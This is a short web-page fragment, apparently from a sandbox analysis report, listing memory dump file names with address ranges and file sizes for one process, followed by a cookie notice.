  • memory/4420-0-0x0000000000840000-0x000000000134F000-memory.dmp

    Filesize

    11.1MB

  • memory/4420-1-0x0000000003CD0000-0x0000000003CD1000-memory.dmp

    Filesize

    4KB

  • memory/4420-3-0x0000000000AB0000-0x0000000000DCD000-memory.dmp

    Filesize

    3.1MB

  • memory/4420-7-0x0000000000840000-0x000000000134F000-memory.dmp

    Filesize

    11.1MB

  • memory/4420-14-0x0000000025F00000-0x000000002615F000-memory.dmp

    Filesize

    2.4MB

  • memory/4420-46-0x0000000000AB0000-0x0000000000DCD000-memory.dmp

    Filesize

    3.1MB

  • memory/4420-70-0x0000000000840000-0x000000000134F000-memory.dmp

    Filesize

    11.1MB

  • memory/4420-71-0x0000000000840000-0x000000000134F000-memory.dmp

    Filesize

    11.1MB

  • memory/4420-72-0x0000000000AB0000-0x0000000000DCD000-memory.dmp

    Filesize

    3.1MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.